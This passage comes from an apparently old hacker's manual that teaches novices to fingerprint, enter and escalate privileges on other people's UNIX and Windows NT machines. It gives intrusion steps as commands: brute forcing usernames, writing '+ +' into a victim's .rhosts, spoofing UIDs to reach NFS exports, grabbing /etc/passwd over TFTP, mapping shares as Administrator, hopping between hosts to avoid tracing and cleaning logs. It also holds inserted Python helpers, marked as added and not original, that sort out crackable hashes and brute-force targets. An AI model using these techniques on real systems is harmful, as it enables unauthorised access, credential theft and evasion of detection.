it to find what flavor (BSD, Solaris, etc.) - the login banner often says. It is important!
- If port 135 or 139 is open, it's probably NT. At a DOS command prompt, type:
c:\nbtstat -A [ip address]
(nbtstat actually talks to the NetBIOS name service on UDP port 137.) If you get a name
table back rather than 'Host not found,' it's definitely Windows: NT, or possibly Windows
9X. More on what this nbtstat stuff means in the NT section.
- If port 21 is open, telnet (or FTP) to it and give the command:
SYST
(just 'syst' at the prompt). This will often tell you the OS of the machine, or at least
whether it's UNIX or NT; the 220 greeting line usually names the FTP server software and
version as well. Sometimes you have to log in before giving this command, sometimes not.
- If port 80 is open you can telnet in and issue this command:
GET / HTTP/1.0
followed by a blank line (hit Enter twice). The 'Server:' header of the reply tells you
what webserver is running. You'll probably want to turn on your telnet logging, because
the info will fly by your screen really fast. If the webserver is IIS, the machine is NT. If
the webserver is Apache, the machine is almost certainly UNIX (probably Linux), although
Apache also runs on NT, and the admin can trim or change that header, so treat it as a
hint rather than proof. Otherwise, look up whatever webserver is running to find out what
OS it's for.
- If ports 21, 23, 80, 135, and 139 are all closed, there's no easy way to find the OS.
But then, without at least one of these ports being open, you probably won't be able to
hack in either (these ports are the primary means you'll get in), so pick a different
computer to try and break into.
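The port 21 and port 80 probes above, carried out over a socket instead of by hand, as an added example that is not part of the original text. The two 'servers' it talks to are stand-ins bound to 127.0.0.1 so that it runs with no network access; their banner strings are invented placeholders, and the OS guess is the rule of thumb from the list above, not a reliable fingerprint:

```python
import socket
import threading

# Constructed replies for the local stand-in servers below. These are not
# captures from any real host; the version strings are placeholders.
FAKE_HTTP_REPLY = (b"HTTP/1.0 200 OK\r\n"
                   b"Server: Apache/1.3.12 (Unix)\r\n"
                   b"Content-Type: text/html\r\n\r\n"
                   b"<html><body>hi</body></html>")
FAKE_FTP_GREETING = b"220 ftp.example.test FTP server ready.\r\n"
FAKE_FTP_SYST = b"215 UNIX Type: L8\r\n"


def _recv_line(sock):
    """Read one newline-terminated line from a socket (byte at a time; fine for banners)."""
    buf = b""
    while not buf.endswith(b"\n"):
        c = sock.recv(1)
        if not c:
            break
        buf += c
    return buf


def http_server_header(host, port, timeout=5.0):
    """Issue 'GET / HTTP/1.0' and return the Server: header value, or None."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(b"GET / HTTP/1.0\r\nHost: " + host.encode() + b"\r\n\r\n")
        data = b""
        while b"\r\n\r\n" not in data:
            chunk = sock.recv(4096)
            if not chunk:
                break
            data += chunk
    headers = data.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    for line in headers.split("\r\n")[1:]:          # skip the status line
        name, _, value = line.partition(":")
        if name.strip().lower() == "server":
            return value.strip()
    return None


def guess_os_from_server(server_header):
    """The rule of thumb from the text: IIS means NT, Apache usually means UNIX."""
    s = (server_header or "").lower()
    if "microsoft-iis" in s:
        return "Windows NT"
    if "apache" in s:
        return "Windows" if "win32" in s else "UNIX"
    return "unknown"


def ftp_syst(host, port, timeout=5.0):
    """Read the 220 greeting, send SYST, return (greeting, syst_reply)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        greeting = _recv_line(sock).decode("latin-1").strip()
        sock.sendall(b"SYST\r\n")
        syst = _recv_line(sock).decode("latin-1").strip()
        sock.sendall(b"QUIT\r\n")
        _recv_line(sock)                             # 221 reply, discarded
    return greeting, syst


# --- local stand-ins so the example runs with no network access ---------

def start_fake_server(handler):
    """Bind 127.0.0.1 on a free port, serve one connection in a thread, return the port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def run():
        conn, _ = srv.accept()
        with conn:
            handler(conn)
        srv.close()

    threading.Thread(target=run, daemon=True).start()
    return port


def fake_http(conn):
    req = b""
    while b"\r\n\r\n" not in req:             # wait for the blank line ending the request
        chunk = conn.recv(4096)
        if not chunk:
            break
        req += chunk
    conn.sendall(FAKE_HTTP_REPLY)


def fake_ftp(conn):
    conn.sendall(FAKE_FTP_GREETING)
    while True:
        cmd = _recv_line(conn).strip().upper()
        if not cmd:
            break
        if cmd == b"SYST":
            conn.sendall(FAKE_FTP_SYST)
        elif cmd == b"QUIT":
            conn.sendall(b"221 Goodbye.\r\n")
            break
        else:
            conn.sendall(b"500 Unknown command.\r\n")


def fingerprint_local_demo():
    """Run both probes against the stand-ins; returns what a scan of a real host would."""
    http_port = start_fake_server(fake_http)
    ftp_port = start_fake_server(fake_ftp)
    server = http_server_header("127.0.0.1", http_port)
    greeting, syst = ftp_syst("127.0.0.1", ftp_port)
    return {"server": server, "os_guess": guess_os_from_server(server),
            "ftp_greeting": greeting, "syst": syst}


if __name__ == "__main__":
    print(fingerprint_local_demo())
```

Point http_server_header and ftp_syst at a real host and port to use them for real. The Server: header and the SYST reply are hints the admin can change, so treat the guess as a starting point for the exploit-archive search described later, not as proof.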
The Kinds of OS's you'll run into are pretty much just NT Server (along with an occasional
NT Workstation and Windows 9X box), and UNIX. At least once in a while, though,
you'll run into a Netware box, and even a mainframe wired to your target's network. That
means to become elite, you'll have to learn a handful of operating systems.
UNIX
UNIX machines are the backbone of the Internet. TCP/IP's reference implementation grew
up inside BSD UNIX, so the OS and the protocols fit each other closely (where else can you
send an entire email in one command?). Internet email addresses take the form
username@computer.com, the same form UNIX mail uses to name a user on a host. The vast
majority of the computers you'll come across on the Internet will be some flavor of UNIX,
be it BSD, Solaris, AIX, Linux, or whatever. UNIX systems are set up to be multiuser.
There will be a UNIX box with lots of dumb terminals (monitors and keyboards with no
boxes of their own) directly hardwired into it. Each person who is authorized to be on a
dumb terminal (or to access the box via telnet) has an account on that system, and
probably on each machine on that subnet (see NIS, below). Their account has its own
directory (folder), named after their username. As soon as they log in, they will be
placed in that directory, their home directory. Every file and directory in a user's home
directory normally belongs to that user, be it a text file, program, or whatever. Also,
every user belongs to a group. This is important, because it is fundamental to how
permissions work.
Not every user is allowed to read every file on the computer, change every file, and run
every program. To list the files in your pwd (present working directory, the "folder"
you're currently in) type 'ls' (without the quotation marks). This is equivalent to the
'dir' command in DOS. Type 'ls -a' to see all files, including hidden ones (files whose
names start with a period). To see the permissions of the files in your pwd, type 'ls -l'.
This will tell you the permissions of each file, including who owns it and what group the
file belongs to. Permission categories are set for read (the ability to read the file),
write (the ability to make changes to the file), and execute (the ability to run the
program, or, for a directory, to enter it). Each category is set for the owner of that file
(user), everyone in the file's group (group), and everyone else on the system (other).
When you issue an ls -l, each file will be listed with a ten-character string. The first
character will be a dash (-) if it's a regular file, a 'd' if it's a directory, or an 'l' if
it's a symbolic link (kinda like a Windows shortcut). Other less common letters may
appear, which I won't cover. The next nine characters are broken up into three sets of
three. The first three apply to 'user,' or the owner of that file. Each of the three
characters is either an r for read, a w for write, or an x for execute. If that class has
permission to read, write, or execute the file, the corresponding letter will appear; if
not, a dash will. The next set of three characters applies to the file's group, with r, w,
and x in the same manner. And the last set of three is for 'other,' meaning the
permissions (r, w, and x) for everyone else on the system. So a permissions string of
-rwxr--r-- means that it's a regular file (not a directory or link), that the owner of that
file can read it, make changes to it, and execute it, that the group can read the file (but
not change or execute it), and that everyone else can read it but nothing else. The
combination to look for is a w in the last three: a world-writable file or directory is one
any account on the box can change, which is exactly what several of the tricks below
depend on.
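An added example (mine, not from the original manual) that parses 'ls -l' output the way the paragraph above reads it by eye, and then answers the two questions a newly cracked account cares about: what can I read, and what can anyone write to. The listing is constructed for the example; readable_by applies the user/group/other rule exactly as described and ignores root's special powers:

```python
from collections import namedtuple

Perm = namedtuple("Perm", "read write execute")
Entry = namedtuple("Entry", "kind perms owner group name")

KINDS = {"-": "file", "d": "directory", "l": "symlink"}

# Constructed 'ls -l' output for the example; not a listing from a real box.
SAMPLE_LS = """\
-rwxr--r--   1 jsmith   users       2048 Jan  1  2000 report.sh
drwxrwxrwx   2 jsmith   users       1024 Jan  1  2000 jsmith
-rw-rw----   1 root     wheel        512 Jan  1  2000 shadow
-rw-r--r--   1 root     root        1234 Jan  1  2000 passwd
lrwxrwxrwx   1 root     root           9 Jan  1  2000 sh -> /bin/bash
"""


def parse_mode(mode):
    """Turn a ten-character mode string like -rwxr--r-- into per-class permissions."""
    if len(mode) != 10:
        raise ValueError("mode string must be ten characters: %r" % mode)
    perms = {}
    for who, start in (("user", 1), ("group", 4), ("other", 7)):
        r, w, x = mode[start:start + 3]
        # 's' and 't' in the execute slot mean executable plus a special bit
        # (setuid/setgid/sticky), which the text above does not cover.
        perms[who] = Perm(r == "r", w == "w", x in "xst")
    return perms


def parse_ls_line(line):
    """Parse one 'ls -l' line: mode, links, owner, group, size, date (3 fields), name."""
    parts = line.split(None, 8)
    if len(parts) < 9:
        raise ValueError("not an ls -l line: %r" % line)
    mode, owner, group, name = parts[0], parts[2], parts[3], parts[8]
    name = name.split(" -> ", 1)[0]           # drop the symlink target
    return Entry(KINDS.get(mode[0], "other"), parse_mode(mode), owner, group, name)


def parse_listing(text):
    """Parse a whole listing, skipping blank lines and the 'total N' header."""
    return [parse_ls_line(l) for l in text.splitlines()
            if l.strip() and not l.startswith("total")]


def world_writable(entries):
    """Names anyone on the system can modify (a symlink's own mode is meaningless)."""
    return [e.name for e in entries if e.kind != "symlink" and e.perms["other"].write]


def readable_by(entries, user, groups):
    """Names the given user (a member of the given groups) can read, per the
    user/group/other rule: the first class that applies decides, as the kernel does."""
    out = []
    for e in entries:
        if e.owner == user:
            ok = e.perms["user"].read
        elif e.group in groups:
            ok = e.perms["group"].read
        else:
            ok = e.perms["other"].read
        if ok:
            out.append(e.name)
    return out


if __name__ == "__main__":
    entries = parse_listing(SAMPLE_LS)
    print("world-writable:", world_writable(entries))
    print("guest (group users) can read:", readable_by(entries, "guest", {"users"}))
```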
UNIX is set up much like DOS, in that there are directories with subdirectories, and a root
directory. Instead of C:\tools\ftp you would see /tools/ftp. The slashes are forward
instead of back, and there is no drive letter - root is simply:
/
Another similarity between UNIX and DOS is the idea of writing a file containing a list of
commands to be run in order. If you're familiar with DOS batch files (.bat, or .cmd for
NT), UNIX shell scripts work the same way. Use vi or some other editor to write
commands one line at a time. To execute them, use chmod to make the file executable
(chmod +x shellscript) and run it by name, or type:
sh shellscript

where sh is the shell you want to execute the script, and shellscript is the script itself.
Oftentimes, if you find a UNIX machine on the Internet, it is connected to a variety of
other computers. What's more exciting is that the UNIX machine you just broke into may
be directly connected to another, more secret UNIX computer that sits behind a firewall
(meaning that you normally wouldn't be able to just telnet to it from your home computer,
and it probably didn't show up on a subnet scan). If you telnet from your hacked UNIX
account to another UNIX machine, your source IP address becomes that of the UNIX
machine you are on (hopping through several boxes this way is often done to make a hack
harder to trace). So let's pretend you run a subnet scan on your target network, looking
for a computer called secret.network.com. Among others, you find comp1.network.com,
comp2.network.com, and comp3.network.com. But no computer named secret. And if you
try to telnet to secret.network.com, your connection lasts only a split second. Firewall.
A few hours of plugging away gets you a root shell on comp2. You then telnet from comp2
to secret, and are presented with a login prompt. Why can you now connect to secret?
Because your IP address is now comp2's, meaning secret (or the firewall in front of it) is
set up to allow connections only from computers on its own network - and it thinks you
are comp2. For a list of connected UNIX machines, look at /etc/hosts, and at
/etc/hosts.equiv and users' .rhosts files, which name the hosts this one already trusts.
When you first log into a machine with a username and password you 'hacked,' find out
what group that account belongs to (the 'id' command tells you), and get a feel for what
kinds of stuff you have access to, and what you don't. If you find yourself with just about
zero access to anything fun, you'll have to use the account you have to obtain one with
more privileges. Here are a few ways to do that.
UNIX Stair-stepping
- Get the unshadowed password file. More on this in the 'Unbelievable... A Hacker!'
section.
- Find a vulnerable program to exploit (such as a buffer overflow - more on this in
'Unbelievable... A Hacker!').
- Install a keylogger or network sniffer.
- If the only password file you can get is shadowed, it still lists every account on the
box: use it, and the finger command, to get a list of usernames, and brute force the
system.
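Both the 'unshadowed password file' and 'shadowed file plus finger' items above come down to reading /etc/passwd, so here is one added example (not from the original text) covering both: it parses the file, tells you whether the hashes are actually in it, and builds the username list to brute force. Both passwd excerpts are constructed, and the hash strings are made-up placeholders in the traditional crypt(3) shape, not hashes of anything:

```python
# Constructed /etc/passwd excerpts. The hash fields are made-up 13-character
# strings in the traditional crypt(3) shape, not real password hashes.
UNSHADOWED = """\
root:Npge08pfz4wuk:0:0:root:/root:/bin/sh
daemon:*:1:1:daemon:/usr/sbin:/bin/sh
jsmith:3Xr7xK9QvLm1E:1001:100:John Smith:/home/jsmith:/bin/csh
guest:3NiLgMtrJuP1I:1002:100:Guest:/home/guest:/bin/sh
"""

SHADOWED = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
agregor:x:500:500:A. Gregor:/exprt/agregor:/bin/bash
oracle:x:501:501:Oracle:/opt/oracle:/bin/false
"""

# Shells that refuse interactive logins; accounts with these are not worth guessing at.
NO_LOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false", "/dev/null", ""}
# Password-field values that mean "no hash here" (shadowed or locked).
PLACEHOLDERS = {"x", "*", "!", "!!", ""}


def parse_passwd(text):
    """Split passwd lines into dicts; skips comments and malformed lines."""
    users = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        users.append({"name": name, "hash": pw, "uid": int(uid), "gid": int(gid),
                      "gecos": gecos, "home": home, "shell": shell})
    return users


def is_shadowed(users):
    """True when no entry carries a hash, i.e. the real hashes live in /etc/shadow."""
    return all(u["hash"] in PLACEHOLDERS or u["hash"].startswith("*") for u in users)


def crackable(users):
    """Accounts whose hash is actually in this file (feed these to a cracker)."""
    return [u["name"] for u in users
            if u["hash"] not in PLACEHOLDERS and not u["hash"].startswith("*")]


def superusers(users):
    """Any UID 0 account is root, whatever it is called."""
    return [u["name"] for u in users if u["uid"] == 0]


def brute_force_targets(users, finger_names=()):
    """Accounts with a real login shell, merged with names gathered from finger."""
    names = {u["name"] for u in users if u["shell"] not in NO_LOGIN_SHELLS}
    return sorted(names | set(finger_names))


if __name__ == "__main__":
    for label, text in (("unshadowed", UNSHADOWED), ("shadowed", SHADOWED)):
        users = parse_passwd(text)
        print(label, "shadowed:", is_shadowed(users), "crackable:", crackable(users),
              "targets:", brute_force_targets(users, ["webmaster"]))
```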
In order to better hack a UNIX system, you'll need to know your way around one. Here
is a basic list of directories in UNIX, and what you might find in them.
/        The root directory.
/dev     Device files (in UNIX, every physical device is represented by a file, like hda
         for the first IDE hard drive on Linux, and tty* for terminals).
/etc     The system directory - all kinds of stuff, including the password file (usually).
/usr     System programs and shared files; on older systems also the users' home
         directories (/usr/jsmith).
/home    Where user home directories usually live on Linux and most modern systems.
/u       Can also hold user home directories on some systems.
/lib     Shared libraries (lib*.so), which are like DLLs for C programs (the .h header
         files live in /usr/include).
/var     Variable data, including the system logs (/var/log, or /var/adm on older
         systems) - go here to clean up your tracks.
/pub     The public directory of an anonymous FTP area (not a standard system directory).
/root    Root (the superuser) home directory.
/bin     Binaries - compiled programs like sh, telnet, and most commands.
Of course, you'll find many more directories and subdirectories than this. This will just
give you an idea of how to navigate a UNIX environment. Also, Appendix C has a list of
UNIX commands.
It's important to know that commands work somewhat differently under different shells.
Yes, UNIX has multiple shells. If you're used to DOS, this may be a bit confusing at
times. As I said in the description of 'shell' in the 'A Little Hacker Lingo' section, a
shell is an interface to an OS. The kernel of any OS is the heart of it - the brain. The
shell is the interface to it - the program between you and the kernel. The shell accepts
commands (either command-line or GUI commands, like double-clicking something) and
interprets them into something the kernel can understand and execute. UNIX is a very
versatile OS, and has multiple shells for multiple ways of interfacing with the system.
/bin/sh    The Bourne Shell - the first (and most basic) UNIX shell; the one scripts are
           usually written for.
/bin/bash  The Bourne Again Shell - a Bourne-compatible shell with command editing and
           history; the default on Linux, and good for beginners.
/bin/csh   The C Shell - csh syntax is modelled on the C programming language.
/bin/tcsh  The TC Shell - an improved C Shell.
/bin/ksh   The Korn Shell - Bourne-compatible with many extras; common on commercial
           UNIX.
/bin/zsh   The Z Shell - Bourne/Korn-like, more programmer friendly.
There are a few more, but these are the most common. To find out what your login shell
is, type the command:
echo $SHELL
(Note: the $ indicates an environment variable, which works much like environment
variables in DOS, only a variable looks like $var instead of %var%. $SHELL is the shell
you were given at login; if a different shell was started since, 'ps' will show it.) Also,
redirectors and pipes work the same in most shells. Here's a quick explanation of special
characters for UNIX:
>    Redirector - sends the output of a command to a file instead of stdout (your
     monitor). >> appends to the file instead of overwriting it.
<    Redirector - feeds a command its input from a file instead of stdin (your keyboard).
|    Pipe - the output of one command is sent as input to another.
&    Ampersand - runs a process in the background and gives you your prompt back.
!    Exclamation - history expansion: !! repeats the last command, and !ls repeats the
     last command that started with 'ls' (inside vi, :! runs a shell command).

For more info on UNIX, get a UNIX book, or read the UNIX Bible text file (available at
The CyberUnderground). This is one operating system that you will need to know, and
well, if you plan on becoming leet.
Hacking UNIX
To break into a UNIX box requires a few things. First, you need to know what flavor it is.
These include Linux, NetBSD, FreeBSD, OpenBSD, System V, SunOS, Solaris, AIX,
Digital UNIX, HP-UX, SCO UnixWare, IRIX, and a few others. Each of those comes in
various version numbers as well. If the login prompt won't tell you, an FTP SYST may;
otherwise you'll have to get in to find out (once you're in, 'uname -a' says).
Follow steps one, two, and three in the 'Getting Started - Your First Night as a Newbie'
section. Find out what ports are open, and what daemons are bound to these ports. Get a
list of usernames through the website (if one exists), through finger, etc. Then spend a
bit of time brute forcing (explained more thoroughly later) each one of these. Then try
the list of commonly used UNIX logins/passwords in Appendix B. Oftentimes this won't
work, but it's easy, so give it a shot.
Next look for vulnerabilities. Open up your CGI vulnerability scanner (or go to
infinityzone.cjb.net and use theirs) and scan for vulnerabilities. If the scanner finds one,
you'll want to learn how to exploit it. The 'System Exploits' section of this text lists a
few. Some scanners explain how to exploit them (or even do it for you), but you'll usually
have to look it up. Go to www.rootshell.com, www.securityfocus.com, www.anticode.com,
www.bugtraq.com, or any other exploit site and look up the vulnerability you found for
specific ways to get in. If you can't find any CGI vulnerabilities, look for service
vulnerabilities. Specifically, find out what programs (and version numbers) are running
on ports 21, 25 and 80. Certain versions of wu-ftpd (an FTP server) are vulnerable, as
are versions of sendmail (the SMTP mail daemon on port 25). Search all the exploit
archives for every daemon on every port of your target. You'll usually find at least one
vulnerable service on a network.
Get that exploit to run. Most are C source, so you'll have to compile it on a UNIX
machine - either your own or another shell account. One issue here is that C exploits are
rarely portable: header files, libraries, and the addresses and offsets the exploit depends
on differ between flavors (and versions) of UNIX. Compiling sometimes involves a bit of
tweaking and playing with cc and gcc. For that reason, you'll be much better at UNIX
hacking if you learn C. Using exploits will be explained in more detail later.
TFTP. The Trivial File Transfer Protocol is similar to its cousin, but much less secure.
TFTP listens on UDP port 69, so if you see that open, you may be in luck. TFTP has no
authentication at all - no usernames and no passwords - so anyone who can reach the
port can ask for files. Another huge insecurity with TFTP is that many installations don't
restrict the server to a single directory (on most UNIX tftpd this is the -s option, which
confines it to /tftpboot). Without it, you can request a file by its full path, all the way
from /, including /etc/passwd. TFTP is used to autoconfigure Cisco routers and to hold
their saved configurations, so if you see a Cisco box on the network, scan its subnets for
an open port 69 - the router config files kept on the TFTP server often contain the
router's passwords.
Rhosts. In a nutshell, if a user has a .rhosts file in his home directory, it lists the
remote hosts (and users) that may run commands or log in as him without a password.
The /etc/hosts.equiv file is the .rhosts equivalent for the entire system (note that
/etc/hosts, which maps hostnames to addresses, is a different file), and is usually
writable only by root. If your victim has a .rhosts file in the /home/john home directory
that allows connections from your UNIX box, you can use the rlogin command to log in
(like telnet) without a password. Both files describe what systems, and what users on
them, can use the R services. The plus sign (+) is a wildcard, meaning any host, or any
user. So pretend you crack the guest account of a Sun box. You want root, but can't run
any programs to exploit the machine. But you notice user jsmith can. And jsmith left his
home directory unprotected (-rwxrwxrwx on all his files, and drwxrwxrwx on the
directory itself). What do you do? This:
echo + + > /home/jsmith/.rhosts
This will put + + into his .rhosts file, allowing you to rlogin to the box as jsmith
(rlogin -l jsmith) from anywhere, without a password. One caveat: BSD-derived rlogind
checks that .rhosts is owned by the user (or root) and is not writable by group or other,
and ignores the file otherwise, so a file you created as guest may simply be skipped on
such a system. We'll go into a bit more depth on the R services and how to abuse them
in the Elite Hacker Tactics section. >:-)
NIS and RPC. RPC (Remote Procedure Call) was developed by Sun Microsystems to let a
program call functions in a program on another UNIX box as if they were local; NFS and
NIS are both built on it. NIS (Network Information Service, originally called Yellow
Pages) distributes the password file, hosts file, and similar tables from a master server
to every machine in its domain - which is why one account usually works on all of them.
RPC services register with the portmapper (port 111) rather than sitting on fixed ports,
so if you see that port listening, use rpcinfo (rpcinfo -p hostname) to query it and get a
list of every RPC service the box runs, with program numbers, versions, and ports -
ypserv, for instance, tells you it is an NIS server. Type man rpcinfo for more
information on portmapper, RPC, and NIS.
NFS. Network File System - the protocol used to share filesystems between UNIX
machines. Having to telnet between UNIX boxes in a network can be a pain in the ass at
times. NFS (which listens on port 2049, and registers with the portmapper) is a way to
mount remote filesystems onto the local machine. Let's say you work primarily on the
machine UNIX1. Occasionally, though, you need to access files on UNIX2, but don't want
to log in to it all the time. So the sysadmin mounts part of UNIX2's filesystem onto your
own. The directory /acct/dir1/ is mounted on your /mnt/u2 directory. So if you issue a
'cd /mnt/u2' you're actually on UNIX2 - but can't go any further up its hierarchy than
/acct/dir1. The way this works is that certain directories are exported, meaning made
available for mounting. To look for exported directories on a remote UNIX server, type
this command:
showmount -e www.victim.com
If there are any exports, you'll see something like:
export list for www.victim.com:
/exprt              (everyone)
/var                (everyone)
/exprt/agregor      agregor
As you can see, /exprt and /var are exported to anyone. To mount either, type (as root on
your own box):
mount www.victim.com:/var /mnt/dir
where /mnt/dir is where you want to mount /var on your own machine (on Linux, add
-t nfs if mount can't work it out). If you cd to /mnt/dir, you're now on your target.
Here's a more complex break-in. Let's say when you mount /exprt, you can't get into
/agregor from there (permission denied) because only the user agregor and root are
allowed access. Let's say you (from your own UNIX box - Linux or something) fingered
agregor@www.victim.com and got:
agregor     /exprt/agregor     Tue, Jan 1, 2000
Here we see that his home directory is /exprt/agregor. So we mount that directory (but
still can't get in). We aren't allowed access... but agregor is! And NFS, with the default
AUTH_SYS authentication, simply trusts the numeric user ID your own machine sends
with each request. So look at who owns the directory by number ('ls -ln' shows UIDs
instead of names), use adduser or useradd to add a user on your own machine with that
same UID (call him agregor to keep things straight), su to him, and pow! - you're in.
Root is the exception: the server maps UID 0 to the unprivileged 'nobody' (root
squashing) unless the export says otherwise, which is why you want a regular user's UID,
not root's. One last note on NFS - only root can mount, so you really should make a
Linux partition on your hard drive. Redhat 5.2 and SuSE (the latest version) only cost
about $30.
The R Services. UNIX utilities like rsh, rlogin, and rcp are used to run commands on, log
in to, or copy files from other machines - without using a password. The syntax for these
commands includes a username (but defaults to the user you're logged in as locally), and
if that user on the target machine has an appropriate .rhosts file in his home directory
(or the host is listed in /etc/hosts.equiv), the command will execute.
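An added example covering the Rhosts section and the R services paragraph above (example code, not the original manual's). It models how rlogind reads a .rhosts file - the '+ +' wildcard, host-only lines, and '-host' denials - and the ownership/permission sanity check that BSD-derived rlogind applies before trusting the file at all, which is what decides whether the echo + + trick works. The trust files and UIDs are constructed; netgroup (@) entries are not modelled:

```python
import stat

# Constructed trust files for the example (not from a real host).
WIDE_OPEN = "+ +\n"
TYPICAL = """\
# hosts that may log in as me without a password
comp2.network.com
comp1.network.com jsmith
-comp3.network.com
"""


def parse_rhosts(text):
    """Return (host, user) pairs; user is None when the line names only a host."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        entries.append((parts[0], parts[1] if len(parts) > 1 else None))
    return entries


def rhosts_allows(entries, remote_host, remote_user, local_user):
    """Would rlogin/rsh from remote_host as remote_user be let in as local_user?

    Rules modelled: '+' matches any host or user; a host-only line trusts the
    same username from that host; '-host' or '-user' denies; first match wins.
    """
    for host, user in entries:
        if host.startswith("-"):
            if host[1:].lower() == remote_host.lower():
                return False
            continue
        host_ok = host == "+" or host.lower() == remote_host.lower()
        if user is None:
            user_ok = remote_user == local_user
        elif user.startswith("-"):
            if host_ok and user[1:] == remote_user:
                return False
            continue
        else:
            user_ok = user == "+" or user == remote_user
        if host_ok and user_ok:
            return True
    return False


def rhosts_file_honoured(file_owner_uid, user_uid, mode):
    """BSD-derived rlogind ignores a .rhosts not owned by the user (or root) or
    writable by group/other, so a file dropped into a world-writable home by
    another account may simply be skipped."""
    if file_owner_uid not in (0, user_uid):
        return False
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        return False
    return True


def rlogin_decision(rhosts_text, file_owner_uid, user_uid, mode,
                    remote_host, remote_user, local_user):
    """Combine both checks the way the daemon does: file sanity first, then rules."""
    if not rhosts_file_honoured(file_owner_uid, user_uid, mode):
        return False
    return rhosts_allows(parse_rhosts(rhosts_text), remote_host, remote_user, local_user)


if __name__ == "__main__":
    # '+ +' written by guest (uid 1002) into jsmith's (uid 1001) home: rejected by a
    # checking rlogind, accepted by one that only reads the rules.
    print(rlogin_decision(WIDE_OPEN, 1002, 1001, 0o644, "evil.example", "anyone", "jsmith"))
    print(rhosts_allows(parse_rhosts(WIDE_OPEN), "evil.example", "anyone", "jsmith"))
```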
To learn the most about UNIX, you must play around with it. Get a shell account from
hobbiton.org, shellyeah.org, or m-net.arbornet.org. These accounts are pretty limited
(some wont let you use compilers, some wont let you use FTP, etc). For best results,
install Redhat Linux on your system. Appendix G will help you with that.
Windows NT
Until recently, UNIX machines made up the vast majority of machines on the Internet.
Windows NT (New Technology) has eaten up some of that percentage. Now, somewhere
between 10% and 20% of machines you'll find on the Net are NT boxes. NT machines
ship with, or can run, almost as many services as UNIX, with a few differences.
Generally, you won't find as many open ports on a Windows box, because a default NT
install runs far fewer network services than a default UNIX install (a socket, by the way,
is one end of a two-way connection between two computers, using any protocol). NT
Server ships with IIS - an HTTP and FTP service. Finger servers can also be purchased
for NT machines. SMTP and POP3 servers come with Microsoft Exchange Server, which is
pretty commonplace. One port that will give your target away as a Windows box is an
open port 139. This is the port for NBT (NetBIOS over TCP/IP), or 'nbsession' according
to some portscanners. UNIX machines talk TCP/IP natively (making them ideal machines
for the Internet), whereas Windows file and printer sharing is built on NetBIOS names
and SMB (Server Message Block). NetBIOS was designed for a single LAN and needs a
transport underneath it: NetBEUI (NetBIOS Extended User Interface) is the original one,
and is not routable, so it cannot cross the Internet; to do that, NT carries NetBIOS over
TCP/IP (NBT, ports 137, 138 and 139). To connect to an NT machine this way, you use
the Microsoft client. Using it to connect to the NetBIOS ports on a Windows machine is
similar in nature to telnetting to port 23 on a UNIX machine. If you have Windows 95 /
98 / NT, you have the Microsoft client. It might not be installed, though. To check, go to
Control Panel, then Network. You should then see a list of protocols you have installed
on your machine. To reach machines across the Internet, you need Client for Microsoft
Networks and TCP/IP (with NetBIOS over TCP/IP enabled); NetBEUI only gets you to
machines on your own LAN. If you are missing any of these, click on 'Add' and add the
appropriate client or protocol (you'll probably need your Windows disks). Also, some of
this only works if you have the latest version of Dial-Up Networking. Go to microsoft.com
for the update. To use the client from the command line, open a DOS box. The command
you will be using is 'net.'
Type 'net' to see a list of net commands. Some of these cannot be issued from a DOS
window. The two you as a hacker should be concerned with are 'net view' and 'net use'.
If ever you come across a machine with an open port 139, there is a chance that the
machine has open shares on it. A Windows share is a directory somewhere on the server
(be it Windows 95, 98, or NT) that is set up to be accessed by others on the network.
Sometimes they are password protected, sometimes not. Once connected to a share, you
can use regular DOS commands (cd, mkdir, edit, etc.) to move about and manipulate files
within it.
Shares come in two varieties: share level and user level. Share level (usually only found
on Win9X peer-to-peer networks) shares are protected only by a single password. Anyone
knowing that password can access that folder. User level shares are more UNIX-ish, in
that your access to them depends on who you are logged in as. Unfortunately, from
Windows 9X you can only present the username you logged into Windows with; only NT's
'net use' lets you name a different user, so to log into an NT machine as someone else
you need NT yourself (either NT Workstation or NT Server). When NT admins set up
user level shares, they determine what users and groups (similar to UNIX groups) can
access them (and the NTFS permissions on the files underneath apply on top of that). To
look for shares on an NT box, at a DOS prompt type:
net view \\ip_address
If you get a message back saying that you need to log in before using net commands, you
either don't have the latest DUN, or you aren't logging into your own machine (at the
Windows Login screen). If the machine has shares (and most NT servers do), you'll see
something like:
Share      Description
-------    -----------------
mktg       Marketing folder
lpt1       Printer 1
acct       Accounting folder
Here there are two shared folders, and a shared printer. If you have Windows 95 or 98,
you'll only be able to connect to these shares if they're share level (not user level), or if
the name and password you logged into Windows with happen to be valid on the target.
To connect, type:
net use x: \\ip_address\sharename
where x is the drive letter you want to map the share to. So if you wanted to map the
mktg folder to your i: drive, you'd type:
net use i: \\123.54.87.9\mktg
If you get the message 'The command completed successfully,' your drive i: is now the
mktg folder on your target machine. If you're prompted for a password, the share is
either share level and password protected, or user level and you won't be able to map to
it from 9X. You also may just plain be denied access. Once you get an NT partition on
your hard drive, you'll be able to log in as a named user. So, if you knew that the
Administrator (superuser, equivalent to root on a UNIX system) password was 'letmein',
you'd type:
net use i: \\123.54.87.9\acct letmein /user:Administrator
to map i: to the user level share acct from your NT machine. You can also map a drive
from the GUI, by right-clicking on Network Neighborhood (or My Computer) and then on
'Map Network Drive.' Another way to get at NT machines is with the nbtstat command.
To get very useful info on a particular NT box, at a command prompt, type:

nbtstat -A ip_address
If the machine is NT and has port 135 or 139 open, you'll see a table full of valuable info.
It might look something like:
NetBIOS Remote Machine Name Table

    Name           Type          Status
---------------------------------------------
srv3        <00>   Unique        Registered
r7labs      <00>   Group         Registered
srv3        <20>   Unique        Registered
srv3        <03>   Unique        Registered
ghost       <03>   Unique        Registered
The hex code in angle brackets ( <these things> ) tells us what each entry in the table
